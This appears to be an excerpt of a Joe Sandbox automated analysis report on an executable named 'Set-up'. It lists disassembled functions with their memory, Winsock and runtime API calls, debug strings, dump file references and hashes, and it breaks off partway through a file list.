_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673D2

Strings

calloc, xrefs: 00A67390, 00A673AF
LIMIT %s:%d %s reached memlimit, xrefs: 00A67397, 00A673B6
MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00A67376

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: 574e9879ec976b29c4702251632cde4c1741609bd0ad6925ac621a52efb4183b
Instruction ID: 271ad812d3d3bab038e6af778c54281c6b58631f411bce7abb104cbc045ce8e0
Opcode Fuzzy Hash: 574e9879ec976b29c4702251632cde4c1741609bd0ad6925ac621a52efb4183b
Instruction Fuzzy Hash: B921D871A143566BD7309F16EC46E5B7BE8EF85B58F04041CFC88DA341E762D90097B2

Function 00A7D5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00A7D65A

Part of subcall function 00A7D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,00A7D5FA,iphlpapi.dll), ref: 00A7D699
Part of subcall function 00A7D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 00A7D6B5
Part of subcall function 00A7D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00FA0814,?,?,00A7D5FA,iphlpapi.dll), ref: 00A7D6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 00A7D60C
QueryPerformanceFrequency.KERNEL32(010EF070), ref: 00A7D643
WSACleanup.WS2_32 ref: 00A7D67C

Strings

iphlpapi.dll, xrefs: 00A7D5F0
if_nametoindex, xrefs: 00A7D606

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: bbf6a577a5eb1ff6d4eec12701072c2c666dfae2f37b0ff0f2c9515281b9353b
Instruction ID: d44c2c80d71bc2f8173003e60a65110a1a1dc539db4101ca37496de361454bbb
Opcode Fuzzy Hash: bbf6a577a5eb1ff6d4eec12701072c2c666dfae2f37b0ff0f2c9515281b9353b
Instruction Fuzzy Hash: A501BCB0A003415BE7217B29AD0B3657AA0AF91700F85846CE888D9186FB7EC598C752

Function 00B14950 Relevance: 6.2, APIs: 4, Instructions: 167networkstringCOMMON

Download Yara Rule

APIs

htonl.WS2_32(7F000001), ref: 00B14A21
gethostname.WS2_32(00000000,00000040), ref: 00B14AA4
WSAGetLastError.WS2_32 ref: 00B14AB3
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 00B14B3F

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLastgethostnamehtonlstrchr
String ID:
API String ID: 655544046-0
Opcode ID: 14691a9f0d5ae6aa6e33d1b188df75202548411f68312a24870d35ccc900d8af
Instruction ID: 5684bff3ee24104e95fb39907ebc4841329897f5cc8529a06785de30518f0b5e
Opcode Fuzzy Hash: 14691a9f0d5ae6aa6e33d1b188df75202548411f68312a24870d35ccc900d8af
Instruction Fuzzy Hash: 1951F2706087008FE7309F25ED49BA776E4EF05755F9408BCE98A8A6D1E779E8C4CB02

Function 00F42E00 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E18
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E34
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E9F

Strings

, xrefs: 00F42E05

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: calloc$free
String ID:
API String ID: 171065143-3916222277
Opcode ID: 8340da7b55f8b6a8bc0a2f8e4c64574dca93e33a5ee7a9c920fa0ab7d3e38a0b
Instruction ID: d453de4b64a64136f1be3869157916c961c4c3bbbfd84bf56cfae4eaa763a84e
Opcode Fuzzy Hash: 8340da7b55f8b6a8bc0a2f8e4c64574dca93e33a5ee7a9c920fa0ab7d3e38a0b
Instruction Fuzzy Hash: 5C1130B1904B018FC724EF29C88065ABBE0FF59324F554B6DE8A99B291D730DD05DBA1

Function 00A61296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 01d85b11d09730fbc40c736d2a7591fbb8035e195df7775a3ce2b1e9988ca6e9
Instruction ID: e05fba3370ac7038455759d552b00acb9d3098b251084509c55bfcbc1579a1c4
Opcode Fuzzy Hash: 01d85b11d09730fbc40c736d2a7591fbb8035e195df7775a3ce2b1e9988ca6e9
Instruction Fuzzy Hash: F43137B59043168FDB20DF66D484399BBF1FB89300F08892DD989AB346D736A905DF91

Function 00A613BB Relevance: 5.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 0834244497133286b4f4a7a6fb1d346a4ae6a406affd08dacd0feb986bec0161
Instruction ID: 1f724c6a23b5c57ed61d3153005243cd3037a6d1870f9d29d0569699aee61695
Opcode Fuzzy Hash: 0834244497133286b4f4a7a6fb1d346a4ae6a406affd08dacd0feb986bec0161
Instruction Fuzzy Hash: 332103B59053068FCB20EF26E4842A9BBF0FB88700B148929E988AB315D735A901DF61

Function 00A63AB0 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(010EF044,00A6208F), ref: 00A63AB5
ReleaseSRWLockExclusive.KERNEL32(010EF044,010EF044,00A6208F), ref: 00A63AD0
ReleaseSRWLockExclusive.KERNEL32(010EF044), ref: 00A63B02

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID:
API String ID: 1021914862-0
Opcode ID: 93707c342a920face396022b32250afb54c2cff33496eae38eb5f85e50640f8a
Instruction ID: 90561bcd43774392a06babeac583a32ff0c09d64db79fea54bd4b4369bf1f96b
Opcode Fuzzy Hash: 93707c342a920face396022b32250afb54c2cff33496eae38eb5f85e50640f8a
Instruction Fuzzy Hash: D8E0E6756001039EDA20BBA39947A1939E1AF10F407C4845477A9A9156DE7F55046772

Function 00A678B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00A678BB

Part of subcall function 00A672A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 00A672F6

Strings

FD %s:%d sclose(%d), xrefs: 00A678CB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: closesocketfwrite
String ID: FD %s:%d sclose(%d)
API String ID: 1967222983-3116021458
Opcode ID: 0be6ac24ee0ba51378d58e11a161028ffd8f768accb9398ec264860d05cecb9d
Instruction ID: 2eca632b24e70d10bf7fb2851dac0b84283398416020405aca5a04ef287e5ec0
Opcode Fuzzy Hash: 0be6ac24ee0ba51378d58e11a161028ffd8f768accb9398ec264860d05cecb9d
Instruction Fuzzy Hash: ECD05E32A292206B8630AA68BD49C9F7BB8DEC5F60B090558F94067205D2209C41D7E2

Function 00B2B060 Relevance: 3.0, APIs: 2, Instructions: 47networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(-00000028,-00000028,-00000028), ref: 00B2B0B9
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00B13C41,00000000), ref: 00B2B0C1

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLastconnect
String ID:
API String ID: 374722065-0
Opcode ID: ea370a1293b91f8a8130011e36626f982d3ed2d8e51ecab36c73caf72371a877
Instruction ID: a98da42ab064bb8ccda68b467e517c3d8994172887011415b4eb3be6ae810f2b
Opcode Fuzzy Hash: ea370a1293b91f8a8130011e36626f982d3ed2d8e51ecab36c73caf72371a877
Instruction Fuzzy Hash: AD01D4322042109BCB215A68E884F6BB7E9FF88374F0407A9F97C971D1DB26ED508752

Function 00F43B60 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F43C1F), ref: 00F43B89
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00F43C1F), ref: 00F43BAC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errnorealloc
String ID:
API String ID: 3650671883-0
Opcode ID: 2ca1cc517e0f7155019b6622fee31838b0ee51dda17d19439f915af180046842
Instruction ID: 29412c94c5a9c8d93f0f02e8b3fa4e07b042ebb04993d3f93e5a9eda0523417f
Opcode Fuzzy Hash: 2ca1cc517e0f7155019b6622fee31838b0ee51dda17d19439f915af180046842
Instruction Fuzzy Hash: C3F09071900A118BCB10AF28CC85259BBE4FF85330B654796EC14CB2D5E734DD82EBA2

Function 00C3CA40 Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,00BDD471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,00BDD52B,00000000,00A61A70,00BE48ED,00FFD9FC), ref: 00C3CA8C
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00A61A70), ref: 00C3CA9E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: mallocmemset
String ID:
API String ID: 2882185209-0
Opcode ID: 6a4c551ac88b568bf51d457acfe3b62999c7da9af08b8efacab2886980a0da8a
Instruction ID: 1194027b363ae072ee01cadcbca21f6048ef40629a6d3690f5801ad7916991f9
Opcode Fuzzy Hash: 6a4c551ac88b568bf51d457acfe3b62999c7da9af08b8efacab2886980a0da8a
Instruction Fuzzy Hash: 9A01F5A5B1034627E620E1656CC5B5F67888BD2714F180430F954F2282E656D948B3B2

Function 00F3EBB0 Relevance: 2.5, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00F3E571), ref: 00F3EBF3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f1c130eb67dcf522bc2f43d60b2369af1bc4e79302a7908e16c5a14c1365b9d1
Instruction ID: e0207337b97752eb7b0eb8501d7b85c15d1ebf06d5d8e6a5ad3274c9b82ad853
Opcode Fuzzy Hash: f1c130eb67dcf522bc2f43d60b2369af1bc4e79302a7908e16c5a14c1365b9d1
Instruction Fuzzy Hash: 9701BBB4A087008BDF15BF79D8C562AB7E0EF94320F554C59E885CB386D634D890EB52

Function 00B2AF70 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00B2AFD0

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
